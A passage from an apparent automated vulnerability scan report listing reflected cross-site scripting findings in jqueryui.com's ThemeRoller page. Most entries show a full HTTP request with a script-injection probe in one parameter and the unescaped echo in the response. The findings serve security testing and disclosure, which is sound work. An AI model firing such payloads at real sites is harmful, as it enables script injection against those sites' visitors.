gImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=02940e"><script>alert(1)</script>bb65b2d20eb&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=02940e"><script>alert(1)</script>bb65b2d20eb&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.138. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 230d2"><script>alert(1)</script>ddcbe0b8022 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png230d2"><script>alert(1)</script>ddcbe0b8022&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
onColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png230d2"><script>alert(1)</script>ddcbe0b8022&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

2.139. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 668dd"><script>alert(1)</script>346464947ea was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png668dd"><script>alert(1)</script>346464947ea&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png668dd"><script>alert(1)</script>346464947ea&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault
...[SNIP]...

2.140. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9503"><script>alert(1)</script>a459dcc6533 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.pngb9503"><script>alert(1)</script>a459dcc6533&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.pngb9503"><script>alert(1)</script>a459dcc6533&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&ic
...[SNIP]...

2.141. http://jqueryui.com/themeroller/ [bgTextureError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b47ff"><script>alert(1)</script>ce132596418 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngb47ff"><script>alert(1)</script>ce132596418&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngb47ff"><script>alert(1)</script>ce132596418&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

2.142. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a07fc"><script>alert(1)</script>513a07b8f38 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pnga07fc"><script>alert(1)</script>513a07b8f38&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pnga07fc"><script>alert(1)</script>513a07b8f38&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222
...[SNIP]...

2.143. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94c1f"><script>alert(1)</script>2d0e22689aa was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png94c1f"><script>alert(1)</script>2d0e22689aa&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
er=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png94c1f"><script>alert(1)</script>2d0e22689aa&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

2.144. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86eda"><script>alert(1)</script>c73d4e689a0 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png86eda"><script>alert(1)</script>c73d4e689a0&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png86eda"><script>alert(1)</script>c73d4e689a0&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconC
...[SNIP]...

2.145. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ded2"><script>alert(1)</script>40818f3f47c was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png3ded2"><script>alert(1)</script>40818f3f47c&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png3ded2"><script>alert(1)</script>40818f3f47c&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

2.146. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1acac"><script>alert(1)</script>4c0c01413e6 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png1acac"><script>alert(1)</script>4c0c01413e6&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png1acac"><script>alert(1)</script>4c0c01413e6&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.147. http://jqueryui.com/themeroller/ [borderColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
